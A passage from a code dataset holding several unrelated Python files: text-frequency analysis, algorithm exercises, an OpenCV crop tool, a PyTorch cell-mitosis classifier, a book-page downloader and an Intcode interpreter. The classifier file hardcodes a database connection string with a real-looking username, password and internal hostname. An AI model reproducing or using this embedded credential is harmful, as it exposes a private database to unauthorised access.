text = text + f.read()\n f.close()\n\n clean = re.compile('<.*?>')\n remove = \"!\\\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~0123456789«»–·\"\n\n text = re.sub(clean, '', text)\n tr = str.maketrans(\"\", \"\", remove)\n text = text.lower()\n\n return text.translate(tr)\n\n\ndef top_word_frequencies(text, top):\n \"\"\"\n :param text: refined text from web crawl free from punctuation and numbers\n :param top: number of top word frequencies to return\n :return: a list of tuples with the most frequent words and their frequencies in descending order\n \"\"\"\n\n words = text.split()\n global TOTAL_WORDS\n TOTAL_WORDS = len(words)\n word_frequencies = collections.Counter(words)\n top_words = word_frequencies.most_common(top)\n\n return top_words\n\n\ndef generate_zipf_data(frequencies):\n \"\"\"\n :param frequencies: ordered list of tuples containing the word and frequency\n :return:\n \"\"\"\n zipf_data = []\n\n for i in frequencies:\n if isinstance(i[0], str):\n probability = i[1] / TOTAL_WORDS\n\n zipf_data.append({\"word\": i[0],\n \"frequency\": i[1],\n \"probability of occurrence\": probability})\n \n return zipf_data\n\n\ndef print_data(zip_file, file_name):\n with open(file_name, \"w\", encoding=\"utf-8\") as outfile:\n for entries in zip_file:\n for key in entries.keys():\n outfile.write(\"%s,\" % (entries[key]))\n outfile.write(\"\\n\")\n\n","sub_path":"src/zipf_analysis/zipfslaw.py","file_name":"zipfslaw.py","file_ext":"py","file_size_in_byte":1847,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"390791839","text":"# 풀이참고\nfrom bisect import bisect_left\n\nn = int(input())\nvalue = list(map(int, input().split()))\n\nstack = [0] # 비교하기 위해 0 넣어줌\n\nfor a in value:\n if stack[-1] < a:\n stack.append(a)\n else:\n stack[bisect_left(stack, a)] = a # a가 들어갈 위치에 a를 넣어준다.\n # a가 들어갈 위치랑 a랑 값이 다를 수 있지만 가장 긴 증가하는 부분 수열의 길이를 구하기 때문에 stack안에 값은 별로 상관없다.\n\nprint(len(stack)-1) # 0빼야함","sub_path":"8주차 이분탐색,그래프/가장긴증가하는부분수열2/김승욱.py","file_name":"김승욱.py","file_ext":"py","file_size_in_byte":523,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"72364755","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[9]:\n\n\nimport cv2, numpy as np\n\n\n# In[10]:\n\n\nimage=cv2.imread('./data/lena.png')\n\n\n# In[11]:\n\n\nimage_to_show=np.copy(image)\n\n\n# In[12]:\n\n\nmouse_pressed=False\n\n\n# In[13]:\n\n\ns_x=s_y=e_x=e_y=-1\n\n\n# In[14]:\n\n\ndef mouse_callback(event, x, y, flags, param):\n global image_to_show,s_x,s_y,e_x,e_y,mouse_pressed\n \n if event==cv2.EVENT_LBUTTONDOWN:\n mouse_pressed=True\n s_x,s_y=x,y\n image_to_show=np.copy(image)\n print(\"event button down: \",s_x,s_y)\n \n elif event==cv2.EVENT_MOUSEMOVE:\n if mouse_pressed:\n image_to_show=np.copy(image)\n cv2.rectangle(image_to_show, (s_x, s_y), (x,y),(0,255,0),1)\n \n elif event==cv2.EVENT_LBUTTONUP:\n mouse_pressed=False\n e_x,e_y=x,y\n print(\"event button up: \", e_x,e_y)\n\n\n# In[15]:\n\n\ncv2.namedWindow('image')\ncv2.setMouseCallback('image', mouse_callback)\n\n\n# In[8]:\n\n\nwhile True:\n cv2.imshow('image', image_to_show)\n k=cv2.waitKey(1)\n if k==ord('c'):\n if s_y > e_y:\n s_y, e_y=e_y, s_y\n if s_x > e_x:\n s_x,e_x=e_x,s_x\n if e_y-s_y >1 and e_x-s_x>0:\n image=image[s_y:e_y,s_x:e_x]\n image_to_show=np.copy(image)\n elif k==27:\n break\n \ncv2.destroyAllWindows()\n\n\n# In[ ]:\n\n\n\n\n\n# In[ ]:\n\n\n\n\n","sub_path":"Basics/Reading Images and Videos/Handling_user_input.py","file_name":"Handling_user_input.py","file_ext":"py","file_size_in_byte":1347,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"264933062","text":"import os, sys, gc, copy, itertools, json\nfrom yaml import load\n\nsys.path.append(\"src\")\nfrom train_model import train_model\nfrom model_analysis import model_analysis, torch_confusion_matrix, plot_confusion_matrix\nfrom plot_images import torch_to_PIL_single_image, ims_labels_to_grid, ims_preds_to_grid, ims_labels_preds_to_grid\n\nimport numpy as np\nimport pandas as pd\nfrom tqdm import tqdm, tqdm_notebook\n\nfrom sklearn.preprocessing import LabelEncoder\nfrom sklearn.metrics import precision_recall_fscore_support\n\nimport torch\nfrom torch import nn\nimport torch.nn.functional as F\nfrom torch.autograd import Variable\nimport torch.optim as optim\nfrom torch.utils.data import TensorDataset, DataLoader\nfrom torchvision import transforms, utils, models\nfrom torchvision.utils import make_grid\n\nfrom tensorboardX import SummaryWriter\n\nfrom sklearn.metrics import precision_recall_curve\nfrom itertools import cycle\n\nimport matplotlib\nimport matplotlib.pyplot as plt\n\nfrom PIL import Image, ImageDraw, ImageFont\nfrom IPython.core.display import display\n\nfrom pytorch_learning_tools.data_providers.DataframeDataProvider import DataframeDataProvider\nfrom pytorch_learning_tools.data_providers.DataframeDataset import DatasetSingleRGBImageToTarget, \\\n DatasetSingleRGBImageToTargetUniqueID\nfrom pytorch_learning_tools.utils.dataframe_utils import filter_dataframe\nfrom pytorch_learning_tools.utils.data_utils import classes_and_weights\n\nimport seaborn as sns\nimport collections\nimport pickle\nfrom models.irena_classification import IrenaClassification\nfrom sqlalchemy import create_engine\n\n\n\n\nclass MitosisClassifier(object):\n \"\"\"This is a script to automate the running of the mitotic program\n\n Attributes:\n\n\n \"\"\"\n\n def __init__(self, base_path, iter_n=0, f_label='mitosis_label'):\n self.GPU_ID = 1\n self.BATCH_SIZE = 64\n self.base_path = base_path\n self.iter_n = iter_n\n self.greg_data = '/root/aics/modeling/gregj/results/ipp/ipp_17_12_03/'\n self.csv_input = 'input_data_files/mito_annotations_all.csv' #\n self.f_type = 'save_flat_proj_reg_path'\n self.f_label = f_label\n # human readable classes\n self.m_class_names = np.array([\"not mitotic\",\n \"M1: prophase 1\",\n \"M2: prophase 2\",\n \"M3: pro metaphase 1\",\n \"M4: pro metaphase 2\",\n \"M5: metaphase\",\n \"M6: anaphase\",\n \"M7: telophase-cytokinesis\"])\n\n self.dp = None\n self.dp_no_annots = None\n self.pred_mito_labels = None\n\n def class_names(self):\n return self.m_class_names\n\n def read_and_filter_input(self, f_label='mitosis_label'):\n\n filt = f_label + ' >= 0'\n\n conn_string = \"postgresql://ro:BR9p66@pg-aics-modeling-01/pg_modeling\"\n conn = create_engine(conn_string)\n dfio = pd.read_sql_table('irena_classifications', conn, index_col='id')\n\n df = dfio.copy(deep=True)\n\n # add absolute path '/root/aics/modeling/gregj/results/ipp/ipp_17_12_03/' + df[self.f_type]\n # df[self.f_type] = '/root/aics/modeling/gregj/results/ipp/ipp_17_12_03' + df[self.f_type]\n\n return df\n\n def transform(self):\n pass\n\n\n def create_data_provider(self, df, splits_pkl, testf=0.2):\n split_fracs = {'train': 1.0 - testf, 'test': testf}\n split_seed = 1\n\n dataset_kwargs = {split: {'target': 'target_numeric', 'image': self.f_type, 'uniqueID': 'save_h5_reg_path'} for split in split_fracs.keys()}\n dataloader_kwargs = {\n split: {'batch_size': self.BATCH_SIZE, 'shuffle': True, 'drop_last': True, 'num_workers': 4, 'pin_memory': True} for split in split_fracs.keys()}\n\n dataset_kwargs['train']['imageTransform'] = self.transform()\n dataset_kwargs['test']['imageTransform'] = self.transform()\n\n\n splits_data = pickle.load(open(splits_pkl, \"rb\"))\n\n self.dp = DataframeDataProvider(df, datasetClass=DatasetSingleRGBImageToTargetUniqueID,\n split_fracs=splits_data,\n split_seed=split_seed,\n uniqueID='save_h5_reg_path',\n dataset_kwargs=dataset_kwargs,\n dataloader_kwargs=dataloader_kwargs)\n\n\n def check_images(self, model, dkey='test'):\n i, mb = next(enumerate(self.dp.dataloaders[dkey]))\n print(\"mb\")\n ims_labels_preds = [(im, label, pred) for i, (im, label, pred) in enumerate(\n zip(mb['image'], mb['target'].numpy(),\n model(Variable(mb['image']).cuda(self.GPU_ID)).data.cpu().max(1)[1].numpy())) if i < 16]\n img = ims_labels_preds_to_grid(ims_labels_preds, ncol=4)\n fname = \"Inspect_{0}\".format(dkey)\n img.save(self.ofname(fname, \"png\"))\n\n def ofname(self, b_name, f_ext):\n fname = \"{0}_{1}.{2}\".format(b_name, str(self.iter_n).zfill(2), f_ext)\n return os.path.join(self.base_path, fname)\n\n def generate_class_weights(self):\n classes, weights = classes_and_weights(self.dp, split='train', target_col='target_numeric')\n weights = weights.cuda(self.GPU_ID)\n CWP = collections.namedtuple('CWP', ['cls', 'weights'])\n return CWP(classes, weights = weights)\n\n def phases(self):\n return self.dp.dataloaders.keys();\n\n def pred_phases(self):\n return self.dp\n\n def select_n_train_n_run_model(self):\n cwp = self.generate_class_weights()\n model_name = 'resnet18'\n model_class = getattr(models, model_name)\n model = model_class(pretrained=True)\n\n model.fc = nn.Linear(model.fc.in_features, len(cwp.cls), bias=True)\n model = model.cuda(self.GPU_ID)\n\n N_epochs = 10\n model = train_model(model, self.dp,\n class_weights=cwp.weights,\n class_names=self.class_names(),\n N_epochs=N_epochs,\n phases=('train', 'test'),\n learning_rate=1e-4,\n gpu_id=self.GPU_ID)\n\n torch.save(model.state_dict(), self.ofname('saved_model_10E', 'pt'))\n self.check_images(model, 'train')\n\n model.eval()\n\n #mito_labels = {k: {'true_labels': [], 'pred_labels': [], 'probability': [], 'pred_entropy': [], 'uniqueID': []} for k in self.dp.dataloaders.keys()}\n mito_labels = {k: {} for k in self.dp.dataloaders.keys()}\n cm_data = {k: {'true_labels': [], 'pred_labels': []} for k in self.dp.dataloaders.keys()}\n\n for phase in self.dp.dataloaders.keys():\n for i, mb in tqdm_notebook(enumerate(self.dp.dataloaders[phase]), total=len(self.dp.dataloaders[phase]),\n postfix={'phase': phase}):\n x = mb['image']\n y = mb['target']\n u = mb['uniqueID']\n\n y_hat_pred = model(Variable(x).cuda(self.GPU_ID))\n _, y_hat = y_hat_pred.max(1)\n\n probs = F.softmax(y_hat_pred.data.cpu(), dim=1)\n entropy = -torch.sum(probs * torch.log(probs), dim=1)\n\n true_label = list(y.data.cpu().squeeze().numpy())\n pred_label = list(y_hat.data.cpu().numpy())\n prob = list(F.softmax(y_hat_pred.data.cpu(), dim=1).numpy())\n pred_ent = list(entropy.data.cpu().numpy())\n\n for idx in range(len(u)):\n mito_labels[phase][u[idx]] = {'true_label': true_label[idx],\n 'pred_label': pred_label[idx],\n 'pred_entropy': pred_ent[idx],\n 'probability': prob[idx]\n }\n\n cm_data[phase]['true_labels'] += true_label\n cm_data[phase]['pred_labels'] += pred_label\n #capture training / test data report\n self.mito_labels = mito_labels\n\n\n\n # model_analysis(mito_labels['train']['true_labels'], mito_labels['train']['pred_labels'])\n\n fig, ax = plot_confusion_matrix(cm_data['train']['true_labels'], cm_data['train']['pred_labels'], classes=self.class_names())\n fig.savefig(self.ofname('CF_training', 'png'))\n plt.close(fig)\n\n fig, ax = plot_confusion_matrix(cm_data['test']['true_labels'], cm_data['test']['pred_labels'], classes=self.class_names())\n fig.savefig(self.ofname('CF_test', 'png'))\n plt.close(fig)\n\n print(\"done with training and test.\")\n #Apply to unannotated data\n\n df_no_annots_unfiltered = None\n # read file\n df_no_annots_unfiltered = pd.read_csv(self.csv_input, # 'input_data_files/mito_annotations_all.csv',\n dtype={'structureSegOutputFilename': str,\n 'structureSegOutputFolder': str}\n )\n\n # filter for NaN mito annotations -- a NaN isn't equal to itself\n lfilt = self.f_label + ' != ' + self.f_label\n df_no_annots = df_no_annots_unfiltered.query(lfilt)\n df_no_annots = df_no_annots.reset_index(drop=True)\n\n # add absolute path #save_flat_proj_reg_path\n df_no_annots[self.f_type] = '/root/aics/modeling/gregj/results/ipp/ipp_17_12_03/' + df_no_annots[self.f_type]\n\n # filter for rows where images are actually present\n df_no_annots = filter_dataframe(df_no_annots, '/root/aics/modeling/gregj/results/ipp/ipp_17_12_03/', self.f_type)\n df_no_annots['target_numeric'] = -1\n df_no_annots['target_numeric'] = df_no_annots['target_numeric'].astype(np.int64)\n\n # save a csv\n csv_out = self.ofname('mito_annotations_missing_with_pngs_{0}'.format(str(self.iter_n).zfill(2)), \"csv\")\n df_no_annots.to_csv(csv_out, index=False)\n\n split_fracs = {'all': 1.0}\n split_seed = 1\n\n dataset_kwargs = {split: {'target': 'target_numeric', 'image': self.f_type, 'uniqueID': 'save_h5_reg_path'} for split\n in split_fracs.keys()}\n dataloader_kwargs = {\n split: {'batch_size': self.BATCH_SIZE, 'shuffle': False, 'drop_last': False, 'num_workers': 4, 'pin_memory': True}\n for split in split_fracs.keys()}\n\n dataset_kwargs['all']['imageTransform'] = self.transform()\n\n self.dp_no_annots = DataframeDataProvider(df_no_annots, datasetClass=DatasetSingleRGBImageToTargetUniqueID,\n split_fracs=split_fracs,\n split_seed=split_seed,\n uniqueID='save_h5_reg_path',\n dataset_kwargs=dataset_kwargs,\n dataloader_kwargs=dataloader_kwargs)\n\n print(\"get predictions.\")\n # Get predictions\n model.eval()\n\n p_mito_labels = {phase: {'pred_labels': [], 'pred_entropy': [], 'pred_uid': [], 'probability': [], 'uid': []} for phase in\n self.dp_no_annots.dataloaders.keys()}\n\n for phase in self.dp_no_annots.dataloaders.keys():\n for i, mb in tqdm_notebook(enumerate(self.dp_no_annots.dataloaders[phase]),\n total=len(self.dp_no_annots.dataloaders[phase]), postfix={'phase': phase}):\n x = mb['image']\n y = mb['target']\n u = mb['uniqueID']\n\n y_hat_pred = model(Variable(x).cuda(self.GPU_ID))\n _, y_hat = y_hat_pred.max(1)\n\n probs = F.softmax(y_hat_pred.data.cpu(), dim=1)\n entropy = -torch.sum(probs * torch.log(probs), dim=1)\n\n p_mito_labels[phase]['pred_labels'] += list(y_hat.data.cpu().numpy())\n p_mito_labels[phase]['pred_entropy'] += list(entropy.data.cpu().numpy())\n p_mito_labels[phase]['probability'] += list(probs.numpy())\n #p_mito_labels[phase]['uid'] += u\n\n self.pred_mito_labels = p_mito_labels\n\n def save_out(self):\n df_pred = pd.DataFrame({'MitosisLabelPredicted': self.pred_mito_labels['all']['pred_labels'],\n 'MitosisLabelPredictedEntropy': self.pred_mito_labels['all']['pred_entropy'],\n self.dp_no_annots.opts['uniqueID']: self.pred_mito_labels['all']['pred_uid'],\n 'MitosisLabelProbability': self.pred_mito_labels['all']['probability']})\n\n df_out = pd.merge(self.dp_no_annots.dfs['all'], df_pred, how='inner', on=self.dp_no_annots.opts['uniqueID'])\n df_out = df_out.drop(columns='target_numeric')\n fname = self.ofname('mitotic_predictions_on_unannotated_cells', 'csv')\n df_out.to_csv(fname)\n\n def run_me(self):\n df = self.read_and_filter_input()\n self.create_data_provider(df, \"splits_db.pkl\")\n print(\"ready to run.\")\n self.select_n_train_n_run_model()\n #self.save_out()\n #precision, recall = self.precision_recall_vec(self.mito_labels['test']['true_labels'], self.mito_labels['test']['probability'])\n #self.plot_prec_recall(precision, recall, self.ofname(\"precision_recall\", \"png\"))\n print(\"finished.\")\n\n def precision_recall_vec(self, tru_label, probs):\n precision = []\n recall = []\n for idx in range(8):\n y_test = [1 if (x == idx) else 0 for x in tru_label]\n y_score = [x[idx] for x in probs]\n tpre, trec, _ = precision_recall_curve(y_test, y_score)\n precision.append(tpre)\n recall.append(trec)\n return (precision, recall)\n\n def plot_prec_recall(self, precision, recall, fname):\n labels = ['not mitotic', 'M1: prophase 1', 'M2: prophase 2', 'M3: pro metaphase 1', 'M4: pro metaphase 2', 'M5: metaphase', 'M6: anaphase', 'M7: telophase-cytokinesis']\n # hexcolors = ['#b3e2cd', '#fdcdac', '#cbd5e8', '#f4cae4', '#e6f5c9', '#fff2ae', '#f1e2cc', '#cccccc']\n colors = sns.color_palette(\"hls\", 8)\n plt.figure() # figsize=(7, 8))\n lines = []\n\n for i, color in zip(range(8), colors):\n l, = plt.plot(recall[i], precision[i], color=color, lw=2)\n lines.append(l)\n # labels.append('Precision-recall for non-mitotic')\n\n fig = plt.gcf()\n fig.subplots_adjust(bottom=0.25)\n plt.xlim([0.0, 1.0])\n plt.ylim([0.0, 1.05])\n plt.xlabel('Recall')\n plt.ylabel('Precision')\n plt.title('Extension of Precision-Recall curve to multi-class')\n lg = plt.legend(lines, labels, loc=(1.2, .5), prop=dict(size=14))\n plt.savefig(fname, bbox_extra_artists=(lg,), bbox_inches='tight')\n\n\n\nclass MitosisClassifierThreeChannel(MitosisClassifier):\n def __init__(self, base_path, iter_n=0, f_label='MitosisLabel'):\n MitosisClassifier.__init__(self, base_path, iter_n, f_label)\n\n\n def transform(self):\n return self.three_channel_transform()\n\n\n def three_channel_transform(self):\n w = 224\n s = 2.5\n\n # this is the xyz geometry imbeded in the image\n gx = 96\n gy = 128\n gz = 64\n\n # xyz once the image has been scaled by s\n nx = int(round(s * gx))\n ny = int(round(s * gy))\n nz = int(round(s * gz))\n\n nwidth = int(round(170 * s))\n nheight = int(round(230 * s))\n\n # offsets for each pain within the image\n xo = 0\n yo = 90\n x2o = 40\n y2o = 50\n x3o = 40\n\n # start coordinates for each fram\n x1s = xo + 0\n y1s = yo + 0\n x2s = x2o + nz\n y2s = y2o + (nheight - w - 50)\n x3s = x3o + nz\n\n return transforms.Compose(\n [transforms.ToPILImage(), transforms.Resize(nwidth), transforms.CenterCrop((nheight, nwidth)),\n transforms.ToTensor(), transforms.Lambda(lambda x: torch.stack(\n [x[2, y1s:(w + y1s), x1s:(w + x1s)], x[2, y1s:(w + y1s), x2s:(w + x2s)],\n x[2, y2s:(w + y2s), x3s:(w + x3s)]]))])\n\n\nclass MitosisClassifierOneChannel(MitosisClassifier):\n def __init__(self, base_path, iter_n=0, f_label='MitosisLabel'):\n MitosisClassifier.__init__(self, base_path, iter_n, f_label)\n\n\n def transform(self):\n return self.one_channel_transform()\n\n\n def one_channel_transform(self):\n w = 224\n\n mask = torch.ones([3, w, w])\n mask[1, :, :] = 0\n\n return transforms.Compose(\n [transforms.ToPILImage(), transforms.Resize((w, w)),\n transforms.ToTensor(), transforms.Lambda(lambda x: mask*x)])\n\nclass MitosisClassifierZProj(MitosisClassifier):\n def __init__(self, base_path, iter_n=0, f_label='MitosisLabel'):\n MitosisClassifier.__init__(self, base_path, iter_n, f_label)\n self.f_type = 'save_flat_reg_path'\n\n\n def transform(self):\n return self.z_channel_transform()\n\n\n def z_channel_transform(self):\n w = 224\n\n mask = torch.ones([3, w, w])\n mask[1, :, :] = 0\n\n\n return transforms.Compose([transforms.ToPILImage(), transforms.Resize(256), transforms.CenterCrop(224),\n transforms.ToTensor(), transforms.Lambda(lambda x: mask*x)])\n\n\nclass Mitosis2CZ(MitosisClassifier):\n def __init__(self, base_path, iter_n=0, f_label='MitosisLabel'):\n MitosisClassifier.__init__(self, base_path, iter_n, f_label)\n self.base_path = os.path.join(self.base_path, \"Z\")\n\n def transform(self):\n return self.three_channel_transform()\n\n\n def three_channel_transform(self):\n w = 224\n s = 2.5\n\n # this is the xyz geometry imbeded in the image\n gx = 96\n gy = 128\n gz = 64\n\n # xyz once the image has been scaled by s\n nx = int(round(s * gx))\n ny = int(round(s * gy))\n nz = int(round(s * gz))\n\n nwidth = int(round(170 * s))\n nheight = int(round(230 * s))\n\n # offsets for each pain within the image\n xo = 0\n yo = 90\n x2o = 40\n y2o = 50\n x3o = 40\n\n # start coordinates for each fram\n x1s = xo + 0\n y1s = yo + 0\n x2s = x2o + nz\n y2s = y2o + (nheight - w - 50)\n x3s = x3o + nz\n\n blank = torch.zeros([w, w])\n\n return transforms.Compose(\n [transforms.ToPILImage(), transforms.Resize(nwidth), transforms.CenterCrop((nheight, nwidth)),\n transforms.ToTensor(), transforms.Lambda(lambda x: torch.stack(\n [x[0, y1s:(w + y1s), x2s:(w + x2s)],\n blank,\n x[2, y1s:(w + y1s), x2s:(w + x2s)]\n ]))])\n\n\nclass Mitosis2CX(MitosisClassifier):\n def __init__(self, base_path, iter_n=0, f_label='MitosisLabel'):\n MitosisClassifier.__init__(self, base_path, iter_n, f_label)\n self.base_path = os.path.join(self.base_path, \"X\")\n\n def transform(self):\n return self.three_channel_transform()\n\n\n def three_channel_transform(self):\n w = 224\n s = 2.5\n\n # this is the xyz geometry imbeded in the image\n gx = 96\n gy = 128\n gz = 64\n\n # xyz once the image has been scaled by s\n nx = int(round(s * gx))\n ny = int(round(s * gy))\n nz = int(round(s * gz))\n\n nwidth = int(round(170 * s))\n nheight = int(round(230 * s))\n\n # offsets for each pain within the image\n xo = 0\n yo = 90\n x2o = 40\n y2o = 50\n x3o = 40\n\n # start coordinates for each fram\n x1s = xo + 0\n y1s = yo + 0\n x2s = x2o + nz\n y2s = y2o + (nheight - w - 50)\n x3s = x3o + nz\n\n\n blank = torch.zeros([w, w])\n\n\n return transforms.Compose(\n [transforms.ToPILImage(), transforms.Resize(nwidth), transforms.CenterCrop((nheight, nwidth)),\n transforms.ToTensor(), transforms.Lambda(lambda x: torch.stack(\n [x[0, y1s:(w + y1s), x1s:(w + x1s)],\n blank,\n x[2, y1s:(w + y1s), x1s:(w + x1s)]\n ]))])\n\n\n\n\nclass Mitosis2CY(MitosisClassifier):\n def __init__(self, base_path, iter_n=0, f_label='MitosisLabel'):\n MitosisClassifier.__init__(self, base_path, iter_n, f_label)\n self.base_path = os.path.join(self.base_path, \"Y\")\n\n\n def transform(self):\n return self.three_channel_transform()\n\n\n def three_channel_transform(self):\n w = 224\n s = 2.5\n\n # this is the xyz geometry imbeded in the image\n gx = 96\n gy = 128\n gz = 64\n\n # xyz once the image has been scaled by s\n nx = int(round(s * gx))\n ny = int(round(s * gy))\n nz = int(round(s * gz))\n\n nwidth = int(round(170 * s))\n nheight = int(round(230 * s))\n\n # offsets for each pain within the image\n xo = 0\n yo = 90\n x2o = 40\n y2o = 50\n x3o = 40\n\n # start coordinates for each fram\n x1s = xo + 0\n y1s = yo + 0\n x2s = x2o + nz\n y2s = y2o + (nheight - w - 50)\n x3s = x3o + nz\n\n blank = torch.zeros([w, w])\n\n return transforms.Compose(\n [transforms.ToPILImage(), transforms.Resize(nwidth), transforms.CenterCrop((nheight, nwidth)),\n transforms.ToTensor(), transforms.Lambda(lambda x: torch.stack(\n [\n x[0, y2s:(w + y2s), x3s:(w + x3s)],\n blank,\n x[2, y2s:(w + y2s), x3s:(w + x3s)]\n ]))])\n","sub_path":"ThreeChannel.py","file_name":"ThreeChannel.py","file_ext":"py","file_size_in_byte":21844,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"480661156","text":"import urllib\n# test url\nhtml_base = \"http://202.119.70.51:88/png/png.dll?did=a174&pid=A7421810F5CDEBDC155FF07C5B49C86948799B8BC53C4C40FA101644549576313F82ABEF167B9445B880B868074DAACEEC2D7C5BE2E51E5C6454E27D56E41C16D11B6CF00E124DA036C6A53FEEA65DBC60852EA62D2235B1706754D32D93A40CF9B3E83EE631BEBF5F8AE2EBE853E56AF048&jid=/\"\n# online picture\nhtml_extension = \".jpg\"\n# save pictures in directory\ndirectory = \"D:\\\\misc\\python\\\\test\\\\\"\n# download all pictures of the online book\nfor index in range(1,434):\n html_index = str(index)\n html_len = len(html_index)\n if html_len == 1:\n html_index = \"00000\" + html_index\n\n if html_len == 2:\n html_index = \"0000\" + html_index\n\n if html_len == 3:\n html_index = \"000\" + html_index\n\n if html_len == 4:\n html_index = \"00\" + html_index\n\n if html_len == 5:\n html_index = \"0\" + html_index\n print(html_index)\n # the picture's url\n html = html_base + html_index + html_extension\n f = open(directory + html_index + '.jpg', 'wb')\n request = urllib.urlopen(html)\n buf = request.read()\n f.write(buf)\n f.close()\n","sub_path":"libDownloader.py","file_name":"libDownloader.py","file_ext":"py","file_size_in_byte":1114,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"162023364","text":"\"\"\"\nsolution adventofcode day 5 part 2.\n\nhttps://adventofcode.com/2019/day/5#part2\n\nauthor: pca\n\"\"\"\n\nimport argparse\nfrom pathlib import Path\nfrom general.general import read_file\nimport operator\n\ndef is_not_zero(value):\n return value != 0\n\n\ndef is_zero(value):\n return value == 0\n\ndef is_less(a, b):\n return 1 if a < b else 0\n\ndef is_equal(a, b):\n return 1 if a == b else 0\n\nclass IntMachine:\n OP_ADD = 1\n OP_MUL = 2\n OP_INPUT = 3\n OP_OUTPUT = 4\n OP_JMP_TRUE = 5\n OP_JMP_FALSE = 6\n OP_LESS = 7\n OP_EQUAL = 8\n OP_HALT = 99\n\n def __init__(self, program_code, input_values):\n self.pc = 0\n\n if len(program_code) > 0:\n self.memory = {pos: int(ch) for pos, ch in enumerate(program_code.split(','))}\n else:\n self.memory = dict()\n\n self.output = list()\n self.input = list(input_values)\n self.halted = False\n self.max_steps = 50000\n\n def read_next_input(self):\n \"\"\"\n read in from the input queue.\n \"\"\"\n input_value = self.input[0]\n self.input = self.input[1:]\n\n return input_value\n\n def add_output(self, value):\n self.output.append(value)\n\n def halt(self):\n self.halted = True\n\n def get_value(self, location, immediate):\n if immediate == 1:\n return self.memory[location]\n else:\n store_loc = self.memory[location]\n return self.memory[store_loc]\n\n\n def execute_instruction(self):\n funcs = {IntMachine.OP_ADD: operator.add,\n IntMachine.OP_MUL: operator.mul,\n IntMachine.OP_INPUT: self.read_next_input,\n IntMachine.OP_OUTPUT: self.add_output,\n IntMachine.OP_JMP_TRUE: is_not_zero,\n IntMachine.OP_JMP_FALSE: is_zero,\n IntMachine.OP_LESS: is_less,\n IntMachine.OP_EQUAL: is_equal,\n IntMachine.OP_HALT: self.halt}\n\n # lookup for how many steps to move the pc after an instruction\n pc_moves = {IntMachine.OP_ADD: 4,\n IntMachine.OP_MUL: 4,\n IntMachine.OP_INPUT: 2,\n IntMachine.OP_OUTPUT: 2,\n IntMachine.OP_JMP_TRUE: 3,\n IntMachine.OP_JMP_FALSE: 3,\n IntMachine.OP_LESS: 4,\n IntMachine.OP_EQUAL: 4,\n IntMachine.OP_HALT: 1}\n\n opcode, (p1, p2, p3) = IntMachine.decode_instruction(self.memory[self.pc])\n\n fn = funcs[opcode]\n next_pc = self.pc + pc_moves[opcode]\n\n if opcode in [IntMachine.OP_ADD, IntMachine.OP_MUL, IntMachine.OP_LESS, IntMachine.OP_EQUAL]:\n val1 = self.get_value(self.pc + 1, p1)\n val2 = self.get_value(self.pc + 2, p2)\n # check to be on the safe side\n if p3 == 1:\n raise ValueError(f\"Error at location {self.pc} for instruction {opcode}.\")\n\n res = fn(val1, val2)\n store_loc = self.memory[self.pc + 3]\n self.memory[store_loc] = res\n # input\n elif opcode == IntMachine.OP_INPUT:\n if p1 == 1:\n raise ValueError(f\"Error at location {self.pc} for instruction {opcode}.\")\n res = fn()\n store_loc = self.memory[self.pc + 1]\n self.memory[store_loc] = res\n # output\n elif opcode == IntMachine.OP_OUTPUT:\n val1 = self.get_value(self.pc + 1, p1)\n fn(val1)\n elif opcode in [IntMachine.OP_JMP_FALSE, IntMachine.OP_JMP_TRUE]:\n val1 = self.get_value(self.pc + 1, p1)\n\n # check to be on the safe side\n if p3 == 1:\n raise ValueError(f\"Error at location {self.pc} for instruction {opcode}.\")\n\n res = fn(val1)\n\n if res:\n next_pc = self.get_value(self.pc + 2, p2)\n\n elif opcode == IntMachine.OP_HALT:\n fn()\n\n self.pc = next_pc\n\n @staticmethod\n def decode_instruction(instruction):\n \"\"\"\n ABCDE\n 01002\n\n DE - two-digit opcode, 02 == opcode 2\n C - mode of 1st parameter, 0 == position mode\n B - mode of 2nd parameter, 1 == immediate mode\n A - mode of 3rd parameter, 0 == position mode,\n omitted due to being a leading zero\n \"\"\"\n\n instruction_str = str(instruction)\n\n # get the instruction (last two chars)\n opcode = int(instruction_str[-2:])\n\n # now get the param modes\n mode_param_1 = 1 if instruction_str[-3:-2] == '1' else 0\n mode_param_2 = 1 if instruction_str[-4:-3] == '1' else 0\n mode_param_3 = 1 if instruction_str[-5:-4] == '1' else 0\n\n param_modes = mode_param_1, mode_param_2, mode_param_3\n\n return opcode, param_modes\n\n\n def run(self):\n \"\"\"\n Runs the loaded program\n \"\"\"\n print(\"Starting.\")\n\n steps = 0\n\n while not self.halted or steps > self.max_steps:\n self.execute_instruction()\n\n steps += 1\n\n print(f\"Ending after steps: {steps}\")\n\n\ndef main(args):\n print(args.location)\n\n program_code = read_file(args.location, 'input_day5.txt')[0]\n\n int_machine = IntMachine(program_code, [5])\n int_machine.run()\n\n print(int_machine.output)\n\n return int_machine\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description='puzzle.')\n parser.add_argument(\"--location\",\n type=Path,\n required=True,\n help=\"Location puzzles\")\n args = parser.parse_args()\n\n int_machine = main(args)\n","sub_path":"app/day5_2.py","file_name":"day5_2.py","file_ext":"py","file_size_in_byte":5683,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"374967619","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Jun 10 22:56:30 2018\n\n@author: tzhou\n\"\"\"\nimport os \n\ndef main():\n for root, dirs, files in os.walk('./'):\n for filename in files:\n filepath = os.sep.join([root, filename])\n dirname = root.split(os.sep)[-1]\n print('{}: {}, {}'.format(filepath, dirname, filename))\n \nif __name__ == '__main__':\n main()","sub_path":"os.py","file_name":"os.py","file_ext":"py","file_size_in_byte":391,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"320655189","text":"import tensorflow as tf\r\nimport time\r\nimport param\r\nimport dataHandler as dh\r\nimport numpy as 